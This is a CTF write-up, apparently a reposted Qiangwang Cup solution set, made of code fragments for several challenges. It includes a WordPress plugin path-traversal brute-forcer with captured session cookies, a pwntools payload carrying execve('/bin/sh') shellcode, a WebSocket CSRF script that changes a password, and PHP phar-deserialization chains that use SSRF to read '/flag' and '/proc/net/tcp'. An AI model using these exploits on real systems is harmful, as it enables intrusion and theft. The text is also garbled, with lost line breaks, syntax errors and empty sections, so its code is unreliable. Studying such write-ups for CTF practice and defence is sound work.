-
rcefile
-
polydiv
# sh.recvuntil("XXXX+")
# suffix = sh.recvuntil(')').decode("utf8")[:-1]
# log.success(suffix)
# sh.recvuntil("== ")
# cipher = sh.recvline().strip().decode("utf8")
# sh.sendlineafter("Give me XXXX: ", proof)
from Crypto.Util.number import *
from hashlib import *
from pwn import *
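import string
from itertools import product

# NOTE: this part of the page is a Sage script (see the `R.<x> = Zmod(2)[]`
# ring declaration below); it needs the Sage preparser, not plain CPython.

sh = remote()  # host/port are not given on the page; pass them here

# --- proof of work: the banner contains "XXXX+<suffix>)" and "== <hexdigest>" ---
sh.recvuntil("XXXX+")
suffix = sh.recvuntil(')').decode("utf8")[:-1]
log.success(suffix)
sh.recvuntil("== ")
table = string.ascii_letters + string.digits
cipher = sh.recvline().strip().decode("utf8")


def solve_pow(suffix, cipher, alphabet=None, length=4):
    """Find the `length`-character prefix x with sha256(x + suffix) == cipher.

    Args:
        suffix: the known suffix printed by the server.
        cipher: the expected hex digest, as printed by the server.
        alphabet: characters to try at each position (default: `table`).
        length: number of characters to brute force.

    Returns:
        The first matching prefix, or None when no candidate matches.
    """
    chars = table if alphabet is None else alphabet
    # product() enumerates in the same order as the four nested loops the page
    # used, but we stop at the first hit instead of hashing all 62**4 candidates.
    for combo in product(chars, repeat=length):
        candidate = "".join(combo)
        if sha256((candidate + suffix).encode()).hexdigest() == cipher:
            return candidate
    return None


proof = solve_pow(suffix, cipher)
if proof is None:
    # The page's version would hit a NameError on `proof` here; fail clearly instead.
    raise RuntimeError("no proof-of-work prefix found for the given suffix/digest")
log.success(proof)
sh.sendlineafter("Give me XXXX: ", proof)

# Polynomials over GF(2); from here on `x` is the ring generator.
R.<x> = Zmod(2)[]


def read_poly(label):
    """Read the polynomial the server prints after `label` as an element of R."""
    sh.recvuntil(label)
    # The delimiter is printed as "n" on the page, most likely a "\n" whose
    # backslash was lost in the paste; kept as printed so behaviour matches.
    text = sh.recvuntil("n")[:-1].replace(b"^", b"**")
    # eval() on bytes received from the remote side: whatever the server sends
    # is executed as code in this process. Tolerable for a throw-away solver
    # talking to a known challenge server, not for anything else.
    return eval(text)


for _ in range(40):
    rx = read_poly("r(x) = ")
    ax = read_poly("a(x) = ")
    cx = read_poly("c(x) = ")
    sh.recvuntil("b(x) = ")
    sh.sendline(str((rx - cx) / ax))
sh.interactive()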
-
ASR
# from secret import falg
# pad = lambda s:s + bytes([(len(s)-1)%16+1]*((len(s)-1)%16+1))
# n = getPrime(128)**2 * getPrime(128)**2 * getPrime(128)**2 * getPrime(128)**2
# e = 3
# flag = pad(flag)
# print(flag)
# assert(len(flag) >= 48)
# m = int.from_bytes(flag,'big')
# c = pow(m,e,n)
# print(f'n = {n}')
# print(f'e = {e}')
# print(f'c = {c}')
# '''
from functools import reduce
# RSA parameters from the challenge output (see the commented source above):
# n is the square of the product of four 128-bit primes and e = 3.
n = 8250871280281573979365095715711359115372504458973444367083195431861307534563246537364248104106494598081988216584432003199198805753721448450911308558041115465900179230798939615583517756265557814710419157462721793864532239042758808298575522666358352726060578194045804198551989679722201244547561044646931280001
e = 3
c = 945272793717722090962030960824180726576357481511799904903841312265308706852971155205003971821843069272938250385935597609059700446530436381124650731751982419593070224310399320617914955227288662661442416421725698368791013785074809691867988444306279231013360024747585261790352627234450209996422862329513284149

# The four recovered 128-bit prime factors.
P1, P2, P3, P4 = (
    223213222467584072959434495118689164399,
    218566259296037866647273372633238739089,
    260594583349478633632570848336184053653,
    225933944608558304529179430753170813347,
)
assert n == (P1 * P2 * P3 * P4) ** 2

# Euler's totient of the partial modulus (P1*P3)**2. Only this part is
# inverted: 3 divides both P2-1 and P4-1, so e has no inverse modulo those
# factors and their cube roots are taken separately (nthroot_mod lines below).
phi = P1 * (P1 - 1) * P3 * (P3 - 1)
from Crypto.Util.number import *
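from math import gcd

# Sanity check: e must be invertible modulo phi, so this should print 1
# (stdlib gcd instead of Crypto's GCD; identical for positive ints).
print(gcd(e, phi))
# Private exponent for the (P1*P3)**2 part. Note that d is not used again
# anywhere on this page; the residue m below is given as a literal.
d = inverse(e, phi)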
from sympy import *
# m2 = nthroot_mod(c,3,P2,True)
# print(m2)
# m2 = nthroot_mod(c,3,P4,True)
# print(m2)
# Residue used for the P1*P3 component of the CRT below. How it was derived is
# not shown on the page -- presumably from d above; recompute it to confirm.
m = 50285288042907373014089492494812223136212714158049271523227438161885132141972
# Candidate cube roots of c modulo P2 and modulo P4 (compare the commented
# nthroot_mod() calls above); three each, since 3 divides P2-1 and P4-1.
m1s = [
    5366126490251257564421634982763999075,
    54017009972585088360569997378772209006,
    159183122833201520722281740271702531008,
]
m2s = [
    43972919603849682780990360817839460344,
    84132055525449472521332928867042183796,
    97828969479259149226856141068289169207,
]
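def CRT(ai, mi):
    """Solve the simultaneous congruences x = ai[k] (mod mi[k]) for every k.

    Args:
        ai: residues, one per modulus; any sequence of ints (or int-like values).
        mi: positive, pairwise coprime moduli, same length as ``ai``.

    Returns:
        The unique solution x with 0 <= x < prod(mi).

    Raises:
        ValueError: if the sequences are empty or differ in length, or if the
            moduli are not pairwise coprime.
    """
    from math import gcd

    residues = [int(a) for a in ai]
    moduli = [int(mod) for mod in mi]
    if not moduli or len(residues) != len(moduli):
        raise ValueError("CRT needs one residue per modulus")
    # The page's version asserted reduce(GCD, mi) == 1, i.e. that the gcd of
    # *all* moduli is 1. That also accepts e.g. (6, 10, 15), which are not
    # pairwise coprime, and the formula below is then simply wrong. Pairwise
    # coprimality is the real precondition, so check exactly that.
    for idx, p in enumerate(moduli):
        for q in moduli[idx + 1:]:
            if gcd(p, q) != 1:
                raise ValueError(f"moduli {p} and {q} are not coprime")
    M = 1
    for mod in moduli:
        M *= mod
    total = 0
    for a, mod in zip(residues, moduli):
        Mi = M // mod
        total += a * Mi * _modinv(Mi, mod)
    return total % M


def _modinv(a, m):
    """Return a**-1 mod m by the extended Euclidean algorithm (m >= 1).

    Raises ValueError when gcd(a, m) != 1.
    """
    a %= m
    old_r, r = a, m
    old_s, s = 1, 0
    while r:
        q = old_r // r
        old_r, r = r, old_r - q * r
        old_s, s = s, old_s - q * s
    if old_r != 1:
        raise ValueError(f"{a} has no inverse modulo {m}")
    return old_s % m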
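# Try every pair of candidate cube roots together with the P1*P3 residue and
# print each combination; the page leaves picking the readable one to the
# reader. CRT() and long_to_bytes() raise on inconsistent input, so a failure
# is reported and the search simply continues.
for m1 in m1s:
    for m2 in m2s:
        try:
            combined = CRT([int(m1), int(m2), m], [int(P2), int(P4), int(P1 * P3)])
            print(long_to_bytes(combined))
        except Exception as e:  # the page had `exceptException`, a syntax error
            print(str(e))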
-
WP-UM
Host: eci-2ze7r7wnzasxlkt9i15e.cloudeci1.ichunqiu.com
Cookie: wordpress_1a2fb3faa043b8a7518c85a26e639a75=cnm%7C1659359913%7CjGNVlbPkqjs6Yfr8VqU4f9Grn7wVF9yTi6OYoO4kuGC%7Cb8fd9fb9bdedaff6d5a4880dd894993f7a52f07de0828302dde18f18b6b2f9ce; chkphone=acWxNpxhQpDiAchhNuSnEqyiQuDIO0O0O; Hm_lvt_2d0601bd28de7d49818249cf35d95943=1658212074,1658628132,1659144034; wordpress_logged_in_1a2fb3faa043b8a7518c85a26e639a75=cnm%7C1659359913%7CjGNVlbPkqjs6Yfr8VqU4f9Grn7wVF9yTi6OYoO4kuGC%7C9ebbfce6203217cd1cae1cc6dba7c268674cbdf4003af9f9623dc7548ae197f1
Content-Type: application/x-www-form-urlencoded
Content-Length: 159
field_name=test&filepath=/../../../../../../../../username/1M&field_id=um_field_4&form_key=Upload&action=um_show_uploaded_file&pf_nonce=1d833af826&is_ajax=true
# NOTE(review): indentation was lost in this paste; the loop bodies below are
# reproduced exactly as printed. `requests` is used but never imported in this
# excerpt.
# Candidate characters tried at each position.
tables =r'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789_{}-'
# Same admin-ajax endpoint and session cookies as the captured request above;
# the cookie values are specific to that session.
url ="http://eci-2ze7r7wnzasxlkt9i15e.cloudeci1.ichunqiu.com/wp-admin/admin-ajax.php"
headers = {
'Cookie':'wordpress_1a2fb3faa043b8a7518c85a26e639a75=cnm%7C1659359913%7CjGNVlbPkqjs6Yfr8VqU4f9Grn7wVF9yTi6OYoO4kuGC%7Cb8fd9fb9bdedaff6d5a4880dd894993f7a52f07de0828302dde18f18b6b2f9ce; chkphone=acWxNpxhQpDiAchhNuSnEqyiQuDIO0O0O; Hm_lvt_2d0601bd28de7d49818249cf35d95943=1658212074,1658628132,1659144034; wordpress_logged_in_1a2fb3faa043b8a7518c85a26e639a75=cnm%7C1659359913%7CjGNVlbPkqjs6Yfr8VqU4f9Grn7wVF9yTi6OYoO4kuGC%7C9ebbfce6203217cd1cae1cc6dba7c268674cbdf4003af9f9623dc7548ae197f1'}
flag =""
# Position i (1..15) times candidate character t. A response containing
# "Remove" counts as a hit: t is appended to flag and the next position starts.
for i in range(1,16):
for t in tables:
data={
'field_name':'test'
,'filepath':'/../../../../../../../../password/%s'%(str(i)+t)
,'field_id':'um_field_4'
,'form_key':'Upload'
,'action':'um_show_uploaded_file'
,'pf_nonce':'1d833af826'
,'is_ajax':'true'
}
print(str(i)+t)
r = requests.post(url,data=data,headers=headers)
if"Remove"in r.text:
flag = flag +t
print(flag)
break
-
devnull
# pwntools driver for the local ./devnull binary; the remote target and the
# gdb attach line are kept commented out, as on the page.
# NOTE(review): log_level is given a bool here; pwntools expects a level name
# or number -- confirm this is what was intended.
context.log_level=True
io=process('./devnull')
#io=remote('182.92.161.17',16302)
#gdb.attach(io,'b *0x40145c')
#raw_input()
io.sendlineafter('filename','b'*0x1f)
# 0x14 filler bytes followed by three 8-byte values; what each of these
# addresses refers to is not explained anywhere on this page.
payload='a'*0x14+p64(0x3fe100)+p64(0x3fe118)+p64(0x401350)
io.sendafter('discard',payload)
# NOTE(review): backslash escapes appear to have been stripped from this paste
# (compare "/bin/shx00" further down), so the literal is plain text as printed.
shellcode = "x31xc0x48xbbxd1x9dx96x91xd0x8cx97xffx48xf7xdbx53x54x5fx99x52x57x54x5exb0x3bx0fx05"
payload=p64(0x3fe000)
payload+='a'*0x18+p64(0x4012D0)+'a'*8+p64(0x3fe138)
payload+=shellcode
io.sendafter('data',payload)
io.sendline("/bin/shx00")
io.recvuntil("n")
io.sendline("cat ./flag 1>&2")
# Appears twice on the page; the second call only runs after the first
# interactive session has ended.
io.interactive()
io.interactive()
-
babyweb
// Opens a WebSocket to the bot service at 127.0.0.1:8888 and, as soon as the
// socket is open, sends a "changepw 123456" command. Since it references
// window.location, this presumably runs inside a visitor's browser, so the
// connection originates from that machine.
// `url` is derived from the current host but never used; wsk() hard-codes the address.
var url = "ws://" + window.location.host + "/bot";
function wsk(){
// Assigned without var/let/const, so `ws` becomes an implicit global.
ws = new WebSocket("ws://127.0.0.1:8888/bot");
ws.onopen = function(event){
var msg = "changepw 123456";
ws.send(msg);
}
}
wsk();
</script>
"product":[{"id":1,"num":0},{"id":2,"num":0}],
"product":[{"id":1,"num":0},{"id":2,"num":1}]
}
-
easyweb
</form>
<?php
// Per-client upload directory named md5("2022qwb" . REMOTE_ADDR), created
// recursively with mode 0333 (no read bit) and with errors suppressed.
// upload.php is only included when the form was submitted.
$upload = md5("2022qwb" . $_SERVER['REMOTE_ADDR']);
@mkdir($upload, 0333, true);
if (isset($_POST['submit'])) {
    include 'upload.php';
}
?>
</form>
// Viewer dispatch. The first check is a deny-list of scheme names (file and
// phar, for instance, are not in it). With a session the file goes to
// AdminShow; otherwise only names containing "guest" or "demo" reach GuestShow.
if (preg_match("/http|https|bzip2|gopher|dict|zlib|data|input|%00/i", $filename)) {
    die("nop");
}
if (isset($_SESSION)) {
    $show = new AdminShow($filename);
    $show->show();
} elseif (preg_match('/guest|demo/i', $filename)) {
    $show = new GuestShow($filename);
    $show->show();
} else {
    die("<p class='tip'>no permission, you can only see string 'demo' and 'guest'</p>");
}
?>
// Upload handler: only requests with a session may upload. A non-empty
// ?fname= query parameter replaces the uploaded file's name before Upload
// processes it, so the stored name is client-controlled.
if (!isset($_SESSION)) {
    die("<p class='tip'>guest can not upload file</p>");
}
if (isset($_GET['fname']) ? !empty($_GET['fname']) : FALSE) {
    $_FILES["file"]["name"] = $_GET['fname'];
}
$upload = new Upload();
$upload->upload();
?>
class GuestShow
{
    public $file;
    public $contents;

    public function __construct($file)
    {
        $this->file = $file;
    }

    // Reads the `name` property of $file (an object triggers its __get) and
    // discards it; always stringifies to "".
    function __toString()
    {
        $str = $this->file->name;
        return "";
    }

    function __get($value)
    {
        return $this->$value;
    }

    // Loads $file and embeds its contents as a base64 data: image.
    function show()
    {
        $this->contents = file_get_contents($this->file);
        $src = "data:jpg;base64," . base64_encode($this->contents);
        echo "<img src={$src} />";
    }

    // echo $this goes through __toString(), i.e. through $this->file->name.
    function __destruct()
    {
        echo $this;
    }
}
class AdminShow
{
    public $source;
    public $str;
    public $filter;
    // `schema` is left undeclared, as in the original: every write to it goes
    // through __set(), which creates it as a dynamic property.

    public function __construct($file)
    {
        $this->source = $file;
        $this->schema = 'file:///var/www/html/';
    }

    // Reads ->source on $str[0] and ->schema on $str[1]; only the second value
    // is returned, but both reads happen (and trigger __get() on objects).
    public function __toString()
    {
        $content = $this->str[0]->source;
        $content = $this->str[1]->schema;
        return $content;
    }

    // Any read of an inaccessible property runs show() first.
    public function __get($value)
    {
        $this->show();
        return $this->$value;
    }

    public function __set($key, $value)
    {
        $this->$key = $value;
    }

    // Fetches schema . source with curl (response headers included) and embeds
    // the raw response as a base64 image. Only three substrings of `source`
    // are refused.
    public function show()
    {
        if (preg_match('/usr|auto|log/i', $this->source)) {
            die("error");
        }
        $url = $this->schema . $this->source;
        $curl = curl_init();
        curl_setopt($curl, CURLOPT_URL, $url);
        curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1);
        curl_setopt($curl, CURLOPT_HEADER, 1);
        $response = curl_exec($curl);
        curl_close($curl);
        $src = "data:jpg;base64," . base64_encode($response);
        echo "<img src={$src} />";
    }

    // On unserialize(), schema and source are forced back to their defaults.
    public function __wakeup()
    {
        if ($this->schema !== 'file:///var/www/html/') {
            $this->schema = 'file:///var/www/html/';
        }
        if ($this->source !== 'admin.png') {
            $this->source = 'admin.png';
        }
    }
}
// NOTE(review): line breaks and spaces were lost in this paste. As printed, each
// `//` comment runs to the end of the physical line and swallows the statements
// that once followed it on their own lines. This AdminShow is a local stand-in
// whose default schema differs from the target's class above.
classAdminShow{ public$source;public$str;public$filter;publicfunction __construct($file) { $this->source =$file;$this->schema ='file://'; }}@unlink("test.phar");$phar=new Phar("test.phar");//the file extension must be phar$phar->startBuffering();$phar->setStub("<?php __HALT_COMPILER(); ?>");//set the stub$o=newGuestShow(newAdminShow("/proc/net/tcp"));$phar->setMetadata($o);//store the custom meta-data in the manifest$phar->addFromString("test.txt","test");//add the file to be archived$phar->stopBuffering();
# NOTE(review): line breaks were lost in this paste: `.read()text = ...` is a
# syntax error as printed, and each `#` comment swallows the statement that
# followed it (the `last = ...`, `new_file = ...` and final write). `sha1` is
# not imported in this excerpt.
file = open("test.phar","rb").read()text = file[:-28] #read from the start up to, but excluding, the signature last = file[-8:] #read the last 8 bytes: the GBMB magic and the signature flag new_file = text+sha1(text).digest() + last #build the new file contents, mainly so that the SHA1 is now correct. open("demo7.jpg","wb").write(new_file)
// Intranet resource reader - test machine
// See phpinfo.php for the configuration details
highlight_file(__FILE__);

// Fetch whatever URL the `url` parameter names with curl (plain GET, body
// returned) and echo it back. Nothing here restricts the scheme or the host,
// so the server itself acts as the client for that URL.
if (isset($_GET['url'])) {
    $link = $_GET['url'];
    $curlobj = curl_init();
    curl_setopt($curlobj, CURLOPT_POST, 0);
    curl_setopt($curlobj, CURLOPT_URL, $link);
    curl_setopt($curlobj, CURLOPT_RETURNTRANSFER, 1);
    $result = curl_exec($curlobj);
    curl_close($curlobj);
    echo $result;
}

// The flag is served only to two fixed source addresses, judged by REMOTE_ADDR.
if ($_SERVER['REMOTE_ADDR'] === '10.10.10.101' || $_SERVER['REMOTE_ADDR'] === '100.100.100.101') {
    system('cat /flag');
    die();
}
?>
$this->file=$file; }}
// NOTE(review): as with the earlier phar-building line, line breaks and spaces
// were lost in this paste, so each `//` comment swallows the statements that
// once followed it. This AdminShow is again a local stand-in; its default
// schema differs from the target's class.
classAdminShow{ public$source;public$str;public$filter;publicfunction __construct($file) { $this->source =$file;$this->schema ='http://'; }}@unlink("test.phar");$phar=new Phar("test.phar");//the file extension must be phar$phar->startBuffering();$phar->setStub("<?php __HALT_COMPILER(); ?>");//set the stub$o=newGuestShow(newAdminShow("10.10.10.10:80/?url=file:///flag"));$phar->setMetadata($o);//store the custom meta-data in the manifest$phar->addFromString("test.txt","test");//add the file to be archived$phar->stopBuffering();
-
crash
-
easylogin
原文始发于微信公众号(山石网科安全技术研究院):强网杯WriteUp|强网先锋 & Web